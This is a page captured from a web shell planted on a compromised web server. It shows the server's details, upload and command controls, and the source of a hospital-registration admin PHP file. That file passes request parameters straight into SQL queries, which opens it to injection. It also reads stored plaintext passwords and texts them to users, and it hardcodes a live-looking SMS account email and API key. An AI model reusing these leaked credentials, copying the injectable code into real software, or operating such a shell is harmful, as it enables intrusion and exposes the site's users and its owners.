Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.21.104.183
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//hsopitalfetch.php
<?php 
session_start();
include("../dbconnection.php");
include 'header.php';
include 'menusuper.php';
$username = "ventexint@gmail.com";
    $apikey = "eebcced9-0ca1-4a6f-940b-c616276e2ec9";
    $sendername = "EASNUP";
if(isset($_POST['signup']))
{
    
 $sql ="UPDATE site_users SET status='$_POST[status]',  entered_by='$_GET[id]' WHERE userno='$_GET[id]'";
 if($qsql = mysqli_query($con,$sql))
		{
    echo "<script>alert('update successfully');</script>";
  } else {
    echo "Sorry, there was an error uploading your file.";
  } 
     
}
?>

<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Admin | Dashboard</title>
 	  </head>
  <body>
   <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
        <?php
    
        $sql ="SELECT * FROM admin WHERE id='$_GET[id]'";
		$qsql = mysqli_query($con,$sql);
	while($rs = mysqli_fetch_array($qsql))
		{
        echo "
	          <form>
	              
   <div  class='account-details'>
        <div> <label for='item'>Hospital name<span>*</span></label>
    <input type='text' value='$rs[hsname]'></div>
	   	        <div>
          <label for='address'>SPOC NAME<span>*</span></label>
          <input type='text' value='$rs[Name]'>
        </div>
	          <div>
          <label>SPOC DESIGNATION<span>*</span></label>
              <input type='text' value='$rs[SPOCDESIGNATION]'>
            </div>
            <div>
            <label for='address'>Email ID<span>*</span></label>
              <input type='email'  value='$rs[EmailID]'>
            </div>
                        <div>
              <label>Mobile number<span>*</span></label>
                <input type='text' value='$rs[numbers]'>
              </div>
              <div>
              <label>Select state<span>*</span></label>
              <select>
              <option value='' disabled selected>$rs[Selectstate]</option>
        </select>
            </div>
            <div>
              <label>Select district<span>*</span></label>
              <select>
              <option value='' disabled selected>$rs[Selectdistrict]</option>
   </select>
            </div>
          <div>
          <label>Pin code<span>*</span></label>
              <input type='text' value='$rs[Pincode]'>
              </div>
            <div>
            <label>Number of sanctioned bed<span>*</span></label>
              <input type='text' value='$rs[sanctionedbed]'>
            </div>
          <div>
          <label for='address'>Hospital parent type<span>*</span></label>
          <select>
    <option value='' disabled selected>$rs[Hospitalparenttype] </option>
 
  </select>
            </div>
            <div>
            <label>Hospital type <span>*</span></label>
            <select>
    <option value='' disabled selected>$rs[Hospitaltype] </option>
  </select>
            </div>
            <div>
          <label>Registration number <span>*</span></label>
              <input type='text' value='$rs[Registrationnumber]'>
            </div>
            <div>
            <label>Registered Under Authority <span>*</span></label>
              <select id='Authorityregistered' name='Authorityregistered'>
    <option value='' disabled selected>$rs[Authorityregistered] </option>
  </select>
              
            </div></div>
             <label>Certificate <span>*</span></label>
                                 <img src='uploads/$rs[myfile]' width='460' height='345'>
                            <a href='#'>uploads/$rs[myfile]</a>
        <br><br>
        </form>
        
           
      ";
		}
      ?>
      
     <?php
session_start();

if(isset($_POST["signup"]))

{ 
$sql ="SELECT * FROM site_users WHERE userno='$_GET[id]'";
		$qsql = mysqli_query($con,$sql);
		if($rd = mysqli_fetch_array($qsql))
	{
         
	    	$name=$rd['name'];
	    		$uname=$rd['uname'];
	    	$numbers=$rd['numbers'];
	    	$password=$rd['password'];
		$message="Hello $name, Your user ID is $uname and Password is $password Regards, HAND Corp";
	$message=urlencode($message);
	$sms ="http://login.aquasms.com/sendSMS?username=ventexint@gmail.com&message=$message&sendername=EASNUP&smstype=TRANS&numbers=$numbers&apikey=eebcced9-0ca1-4a6f-940b-c616276e2ec9";
	//$sms=urlencode($sms);
	$result=file_get_contents($sms);
 if(mysqli_query($con, $sql)){
 echo 'OTP sent Successfully';
 }
	}
}
?>
            <form method='post' name='signup'>
                <select name='status'>
                    <option value='Deactivate'>Deactivate</option>
                     <option value='Active'>Active</option>
                </select>
                 <?php
    
        $sql1 ="SELECT * FROM admin WHERE id='$_GET[id]'";
		$qsql1 = mysqli_query($con1,$sql1);
	while($rs1 = mysqli_fetch_array($qsql1))
		{
		    echo"<input type='hidden'  value='$rs1[id]' name='entered_by'>";
		}
		?>
                
      <input type='submit' name='signup' id='signup' value='Submit'>
   
  </div>
  </div>
</div>
</div>
 <div class="clear"></div>
  </div>
</div>

</section>
</form>

Anon7 - 2022
AnonSec Team